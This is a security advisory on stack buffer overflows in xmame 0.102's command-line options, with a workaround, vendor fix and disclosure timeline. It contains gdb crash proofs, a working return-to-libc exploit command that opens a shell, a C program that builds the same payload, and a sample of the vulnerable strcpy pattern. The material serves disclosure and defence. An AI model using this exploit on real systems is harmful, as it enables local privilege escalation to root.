Xmame and xmess "are ports of MAME, the Multiple Arcade Machine Emulator and MESS, the Multi Emulator Super System. They run primarily on Linux and various flavors of UNIX, although some other operating systems, such as BeOS, are supported to some degree". Stack-based buffer overflows in xmame's handling of several command-line option values allow a local user to gain root privileges on systems where the xmame binaries are installed setuid root.
Credit:
The information has been provided by KaiJern, Lau.
The original article can be found at: http://www.mysec.org/text_advisory/xmame-lang-overflow.txt
Vulnerable Systems:
* xmame version 0.102
Several functions in src/fileio.c and src/unix/fileio.c copy option values into fixed-size buffers without checking their length, so an over-long value overflows the buffer. Most distributions install xmame setuid root (the DGA video modes of xmame.x11 require root), which means any local user can use the overflow to execute code as root.
Exploitation only requires passing an over-long, specially constructed value to any of these command-line options:
* lang
* ctrlr
* pb
* rec
Ubuntu has another vulnerable option:
* jdev
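The following is an added example, not code from xmame or from the advisory, showing the class of bug described above and a bounded replacement. The function names, the 1024-byte buffer size (chosen because 1034 bytes were enough to crash -pb) and the way the option value is received are assumptions; the real code in src/fileio.c is not reproduced here.

```c
/* Added example (not xmame's own code): a fixed-size stack buffer filled
 * from a command-line option value with no length check, beside a bounded
 * version.  Buffer size and names are assumptions. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PATH_BUF 1024   /* assumed size; 1034 bytes crashed -pb in the PoC */

/* Vulnerable pattern: unbounded strcpy() into a stack buffer.  A value
 * longer than PATH_BUF runs past the buffer into the saved frame pointer
 * and return address, which is why the PoC faults at 0x41414141.
 * Shown for illustration only; never call it with untrusted input. */
int open_playback_unsafe(const char *optval)
{
    char path[PATH_BUF];
    strcpy(path, optval);              /* no bound: overflow */
    return path[0] != '\0';
}

/* Hardened: reject values that do not fit, then copy with an explicit
 * bound so the NUL terminator is always inside the buffer. */
int copy_option_value(const char *optval, char *out, size_t outlen)
{
    size_t len = strlen(optval);
    if (len == 0 || len >= outlen) {
        fprintf(stderr, "error: option value too long (%zu bytes, max %zu)\n",
                len, outlen - 1);
        return -1;
    }
    memcpy(out, optval, len + 1);      /* fits, including the NUL */
    return 0;
}

/* Returns 0 if the value would be accepted into a PATH_BUF buffer, -1 if
 * the hardened copy rejects it. */
int check_option_value(const char *optval)
{
    char path[PATH_BUF];
    return copy_option_value(optval, path, sizeof path);
}

/* Helper for constructing test input: n copies of c, NUL terminated. */
char *make_run(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        abort();
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    char path[PATH_BUF];
    if (argc < 3 || strcmp(argv[1], "-pb") != 0) {
        fprintf(stderr, "usage: %s -pb <playback file>\n", argv[0]);
        return 2;
    }
    if (copy_option_value(argv[2], path, sizeof path) != 0)
        return 1;
    printf("playback file: %s\n", path);
    return 0;
}
```

Running the hardened binary with the PoC's 1034-byte argument prints an error and exits instead of faulting; a 1023-byte value (the longest that fits with its terminator) is still accepted.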
Proof of Concept:
-pb :
(gdb) r -pb `ruby -e 'print "A" * 1034'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/games/xmame.x11 -pb
`ruby -e 'print "A" * 1034'`
(no debugging symbols found)
** More **
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1211603264 (LWP 8770)]
DGA requires root rights
Use of DGA-modes is disabled
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
info: trying to parse: /etc/xmame/xmamerc
error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate,
ignoring line
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /etc/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1211603264 (LWP 8770)]
0x41414141 in ?? ()
-rec :
(gdb) r -rec `ruby -e 'print "A" * 1020'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xwings/coding/sploit/xmame/xmame-0.102/xmame.x11
-rec `ruby -e 'print "A" * 1020'`
(no debugging symbols found)
** More **
(no debugging symbols found)
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
info: trying to parse: /usr/local/share/xmame/rc/robbyrc
info: trying to parse: /home/xwings/.xmame/rc/robbyrc
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Exploit:
Platform : Ubuntu
Xmame Version : 0.102 - Selfcompile
Exploit Method : Return to Libc
xwings@pauillac.$ ./xmame.x0 -pb `ruby -e 'print "\x90" * 1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
sh-3.1$
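To make the layout of the return-to-libc frame above explicit, here is an added example (not part of the advisory) that builds the same 1028 bytes the ruby one-liner produces: 1016 bytes of padding up to the saved return address, the address of system(), four junk bytes ("DUMP") that become system()'s own return address, and the pointer system() takes as its argument. The two addresses are the advisory's values from its Ubuntu 0.102 build and are not valid elsewhere; that 0xbffff8aa points at a shell command string is an assumption drawn from the resulting sh prompt. The 0x90 bytes are never executed in this technique, they are only filler.

```c
/* Added example (not from the advisory): builds the ret2libc frame that
 * the advisory passes as the -pb option value.  Addresses are the
 * advisory's own, environment-specific values. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN      1016          /* bytes before the saved return address */
#define SYSTEM_ADDR  0xb7d8f6d0u   /* libc system() on the advisory's box */
#define ARG_ADDR     0xbffff8aau   /* assumed: address of a "/bin/sh" string */
#define PAYLOAD_LEN  (PAD_LEN + 12)

/* Little-endian 32-bit store, as the i386 stack expects. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Writes PAYLOAD_LEN bytes into out and returns that length.
 * Layout: [padding][system addr][fake return][argument pointer]. */
size_t build_ret2libc(unsigned char *out, uint32_t system_addr, uint32_t arg_addr)
{
    memset(out, 0x90, PAD_LEN);                /* filler up to saved EIP */
    put_le32(out + PAD_LEN, system_addr);      /* overwrites saved EIP */
    memcpy(out + PAD_LEN + 4, "DUMP", 4);      /* where system() "returns" */
    put_le32(out + PAD_LEN + 8, arg_addr);     /* system()'s first argument */
    return PAYLOAD_LEN;
}

/* The payload travels through argv, so a NUL byte anywhere in it would
 * cut it short.  Returns 1 if the payload contains a NUL, 0 otherwise. */
int payload_has_nul(const unsigned char *buf, size_t len)
{
    return memchr(buf, '\0', len) != NULL;
}

int main(void)
{
    unsigned char buf[PAYLOAD_LEN];
    size_t n = build_ret2libc(buf, SYSTEM_ADDR, ARG_ADDR);
    if (payload_has_nul(buf, n)) {
        fprintf(stderr, "payload contains a NUL byte; argv would truncate it\n");
        return 1;
    }
    fwrite(buf, 1, n, stdout);                 /* raw bytes, like the ruby -e */
    return 0;
}
```

The NUL check matters in practice: addresses such as system() in libc or the argument string on the stack must be chosen so that none of their bytes is zero, or the option value ends early and the frame is never completed.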
Workaround:
Remove the setuid root bit from all installed xmame executables. Only the DGA modes of xmame.x11 need root; do not run xmame.x11, use xmame.sdl instead, which works without it.
Vendor response:
Upgrade to CVS version. http://x.mame.net/download.html
Disclosure Timeline:
* 01.01.06 - Initial vendor notification
* 02.01.06 - Initial vendor response
* 11.01.06 - Vendor reply, bug fixed
* 11.01.06 - Coordinated public disclosure